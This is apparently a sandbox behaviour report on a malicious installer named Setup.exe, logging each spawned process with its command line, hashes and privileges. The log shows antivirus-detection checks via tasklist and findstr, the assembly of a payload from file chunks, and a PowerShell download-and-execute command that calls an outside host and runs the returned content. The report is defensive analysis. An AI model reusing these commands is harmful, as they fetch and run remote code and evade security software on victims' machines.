                                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                              Start time:06:16:01
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\Setup.exe"
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              File size:73'424'035 bytes
                                                                                                                                                                                                                                                              MD5 hash:EDE2E7D64A73A46B252525A4136B47BF
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                                              Start time:06:16:03
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c move Archive Archive.cmd & Archive.cmd
                                                                                                                                                                                                                                                              Imagebase:0x790000
                                                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                                              Start time:06:16:03
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                                                              Start time:06:16:03
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:tasklist
                                                                                                                                                                                                                                                              Imagebase:0xc20000
                                                                                                                                                                                                                                                              File size:79'360 bytes
                                                                                                                                                                                                                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                                              Start time:06:16:03
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                                              Imagebase:0x650000
                                                                                                                                                                                                                                                              File size:29'696 bytes
                                                                                                                                                                                                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                                              Start time:06:16:04
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:tasklist
                                                                                                                                                                                                                                                              Imagebase:0xc20000
                                                                                                                                                                                                                                                              File size:79'360 bytes
                                                                                                                                                                                                                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                                              Start time:06:16:04
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                                              Imagebase:0x650000
                                                                                                                                                                                                                                                              File size:29'696 bytes
                                                                                                                                                                                                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                                                              Start time:06:16:04
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:cmd /c md 811185
                                                                                                                                                                                                                                                              Imagebase:0x790000
                                                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                                                              Start time:06:16:05
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:extrac32 /Y /E Thousand
                                                                                                                                                                                                                                                              Imagebase:0xda0000
                                                                                                                                                                                                                                                              File size:29'184 bytes
                                                                                                                                                                                                                                                              MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                                                              Start time:06:16:05
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:findstr /V "makes" Makes
                                                                                                                                                                                                                                                              Imagebase:0x650000
                                                                                                                                                                                                                                                              File size:29'696 bytes
                                                                                                                                                                                                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                                              Start time:06:16:06
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:cmd /c copy /b 811185\M.com + Symbol + Bang + Sons + Prefix + Re + Answers + Frank + Chancellor + Enable 811185\M.com
                                                                                                                                                                                                                                                              Imagebase:0x790000
                                                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                                                              Start time:06:16:06
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:cmd /c copy /b ..\Gather + ..\Intend + ..\Couple + ..\Und + ..\Desktop + ..\Laboratories + ..\Leonard c
                                                                                                                                                                                                                                                              Imagebase:0x790000
                                                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                                                              Start time:06:16:06
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:M.com c
                                                                                                                                                                                                                                                              Imagebase:0x930000
                                                                                                                                                                                                                                                              File size:947'288 bytes
                                                                                                                                                                                                                                                              MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                                                                              Start time:06:16:06
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:choice /d y /t 5
                                                                                                                                                                                                                                                              Imagebase:0xac0000
                                                                                                                                                                                                                                                              File size:28'160 bytes
                                                                                                                                                                                                                                                              MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                                                                              Start time:06:16:53
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
                                                                                                                                                                                                                                                              Imagebase:0x450000
                                                                                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                                                              Start time:06:16:53
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                                                              Start time:06:17:00
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe"
                                                                                                                                                                                                                                                              Imagebase:0x340000
                                                                                                                                                                                                                                                              File size:8'767'044 bytes
                                                                                                                                                                                                                                                              MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:Borland Delphi
                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                              • Detection: 78%, ReversingLabs
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                                                                              Start time:06:17:02
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp" /SL5="$60296,7785838,845824,C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff632ac0000
                                                                                                                                                                                                                                                              File size:3'367'424 bytes
                                                                                                                                                                                                                                                              MD5 hash:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:Borland Delphi
                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                                                              Start time:06:17:03
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe" /VERYSILENT
                                                                                                                                                                                                                                                              Imagebase:0x340000
                                                                                                                                                                                                                                                              File size:8'767'044 bytes
                                                                                                                                                                                                                                                              MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:Borland Delphi
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                                                                              Start time:06:17:04
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp" /SL5="$70296,7785838,845824,C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe" /VERYSILENT
                                                                                                                                                                                                                                                              Imagebase:0xa60000
                                                                                                                                                                                                                                                              File size:3'367'424 bytes
                                                                                                                                                                                                                                                              MD5 hash:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:Borland Delphi
                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                                                                              Start time:06:17:32
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"timeout" 9
                                                                                                                                                                                                                                                              Imagebase:0x7ff6a5670000
                                                                                                                                                                                                                                                              File size:32'768 bytes
                                                                                                                                                                                                                                                              MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                                                                              Start time:06:17:32
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                                                                              Start time:06:17:41
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff7c08d0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                                                                              Start time:06:17:41
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:27
                                                                                                                                                                                                                                                              Start time:06:17:41
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                                                                                                                                                                                                                                                              Imagebase:0x7ff705310000
                                                                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                                                                              Start time:06:17:41
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:find /I "wrsa.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff775fd0000
                                                                                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                                                                                              MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                                                                              Start time:06:17:41
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff7c08d0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                                                                              Start time:06:17:41
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                                                                              Start time:06:17:41
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                                                                                                                                                                                                                                                              Imagebase:0x7ff705310000
                                                                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                                                                              Start time:06:17:41
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:find /I "opssvc.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff775fd0000
                                                                                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                                                                                              MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                                                                              Start time:06:17:41
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff7c08d0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                                                                              Start time:06:17:41
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:35
                                                                                                                                                                                                                                                              Start time:06:17:41
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                                                                                                                                                                                                                                                              Imagebase:0x7ff705310000
                                                                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
